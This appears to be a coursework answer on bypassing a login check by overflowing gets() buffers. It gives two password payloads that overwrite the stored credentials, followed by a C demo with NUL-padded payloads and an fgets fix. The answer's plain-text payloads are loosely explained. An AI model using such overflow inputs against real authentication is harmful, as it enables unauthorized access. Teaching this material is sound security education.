Identify a buffer overflow vulnerability in the source of the login program attached to this assignment (assignment.c). Show two possible inputs that can be used to bypass password authentication, i.e., that can allow the adversary to login without knowing the victim’s password. Explain, using up to 300 words, how your attack works. Be specific, and assume that the reader is familiar with the concept of buffer overflows. You can modify the code in order to better understand how it works. However, the buffer overflow described in your report must apply to the original code.

Answer:

gets() is an inbuilt function which does not check the length of the input string, so when the user's input data length is higher than the specified variable length (12 in the given example) a buffer overflow occurs.

In the given code the username and password variables are defined just after candidateusername and candidatepassword, so the memory allocated for them will be one after the other.

In order to bypass password authentication the user needs to overflow the input buffer, as explained with the 2 examples below:

Example 1

enter username: abcd12345678

enter password for user abcd12345678: xyz987654321abcd12345678xyz987654321

This will assign the variable candidateusername "abcd12345678" and the variable candidatepassword "xyz987654321", and reassign the variable username to "abcd12345678" and the variable password to "xyz987654321"; hence the if condition will be true and access will be granted to the user.

Example 2 (considering the username is known)

enter username: alice

enter password for user alice: abcd00000000alice0000000abcd

This will assign the variable candidateusername "alice" and the variable candidatepassword "abcd", and overwrite the password variable to "abcd"; hence the if condition will be true and access will be granted to the user.

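To make the two attacks concrete, here is an added example; it is not assignment.c (which is not on this page) and not the answerer's code. It reconstructs the layout the answer assumes as a C struct, so the order candidateusername, candidatepassword, username, password is guaranteed (a real stack frame gives no such guarantee; the field size 12, the stored credentials "alice"/"s3cret!", and the helper names are all assumptions). The unsafe_gets() helper copies like gets(), ignoring the field size, except that it stops at the end of the frame so the demo never corrupts memory it does not own. The payloads are constructed: each field is padded with NUL bytes, which is what the zeros in the answer's second example are taken to stand for (gets() copies NUL bytes arriving from a pipe), and the second payload shows the answer's first point, that the stored username need not be known because both username and password get overwritten. A bounded read beside it shows the fix.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define FIELD 12   /* buffer size the answer quotes for the assignment */

/* Assumed reconstruction of the four locals in assignment.c. A struct pins the
   order the answer relies on (username and password right after the two
   candidate buffers); a real stack frame gives no such guarantee. */
struct login_frame {
    char candidateusername[FIELD];
    char candidatepassword[FIELD];
    char username[FIELD];
    char password[FIELD];
};

/* One line of attacker-controlled stdin, carried with an explicit length
   because gets() copies NUL bytes arriving from a pipe like any other byte. */
struct line { const unsigned char *bytes; size_t len; };

/* Models gets(): copies up to '\n' or end of input into the field at offset
   `off`, ignoring that field's size, then appends the terminating NUL. The one
   deviation from gets() is the stop at sizeof *f, so this demo never writes
   outside the frame it owns; the real gets() has no bound at all. */
static void unsafe_gets(struct login_frame *f, size_t off, struct line in) {
    unsigned char *base = (unsigned char *)f;
    size_t i = 0;
    while (i < in.len && in.bytes[i] != '\n' && off + i < sizeof *f) {
        base[off + i] = in.bytes[i];
        i++;
    }
    if (off + i < sizeof *f)
        base[off + i] = '\0';
}

/* Models fgets(dst, cap, stdin): at most cap-1 bytes, always NUL-terminated. */
static void bounded_gets(char *dst, size_t cap, struct line in) {
    size_t i = 0;
    while (i < in.len && i + 1 < cap && in.bytes[i] != '\n') {
        dst[i] = (char)in.bytes[i];
        i++;
    }
    dst[i] = '\0';
}

static void load_credentials(struct login_frame *f) {
    memset(f, 0, sizeof *f);
    strcpy(f->username, "alice");    /* assumed stored credentials */
    strcpy(f->password, "s3cret!");
}

/* The login check as the answer describes it; returns 1 when access is granted. */
int login_with_gets(struct line user, struct line pass) {
    struct login_frame f;
    load_credentials(&f);
    unsafe_gets(&f, offsetof(struct login_frame, candidateusername), user);
    unsafe_gets(&f, offsetof(struct login_frame, candidatepassword), pass);
    return strcmp(f.candidateusername, f.username) == 0 &&
           strcmp(f.candidatepassword, f.password) == 0;
}

/* Same check with bounded reads: the payload is cut at 11 bytes and can no
   longer reach username or password. */
int login_with_fgets(struct line user, struct line pass) {
    struct login_frame f;
    load_credentials(&f);
    bounded_gets(f.candidateusername, FIELD, user);
    bounded_gets(f.candidatepassword, FIELD, pass);
    return strcmp(f.candidateusername, f.username) == 0 &&
           strcmp(f.candidatepassword, f.password) == 0;
}

/* Wraps a string literal or char array as a line, without its trailing NUL. */
#define LINE(lit) ((struct line){ (const unsigned char *)(lit), sizeof(lit) - 1 })

/* Constructed payloads for the password prompt. Every field is padded with
   NUL bytes to exactly FIELD bytes so the next field lands on the next local. */
static const char payload_known_user[] =
    "abcd\0\0\0\0\0\0\0\0"    /* candidatepassword = "abcd"              */
    "alice\0\0\0\0\0\0\0"     /* username          = "alice" (unchanged) */
    "abcd";                   /* password          = "abcd"              */
static const char payload_any_user[] =
    "pw\0\0\0\0\0\0\0\0\0\0"  /* candidatepassword = "pw"  */
    "bob\0\0\0\0\0\0\0\0\0"   /* username          = "bob" */
    "pw";                     /* password          = "pw"  */

int main(void) {
    printf("correct credentials : %d\n", login_with_gets(LINE("alice"), LINE("s3cret!")));
    printf("wrong password      : %d\n", login_with_gets(LINE("alice"), LINE("guess")));
    printf("overflow, known user: %d\n", login_with_gets(LINE("alice"), LINE(payload_known_user)));
    printf("overflow, any user  : %d\n", login_with_gets(LINE("bob"), LINE(payload_any_user)));
    printf("fgets vs overflow   : %d\n", login_with_fgets(LINE("alice"), LINE(payload_known_user)));
    return 0;
}
```

The decisive detail is the field padding: a 12-byte field with no room for a terminator means the write for the next field starts exactly at the next local, so the attacker chooses the value of username and password outright. Replacing gets() with fgets(buf, sizeof buf, stdin) (or any bounded read) removes the primitive, as login_with_fgets shows.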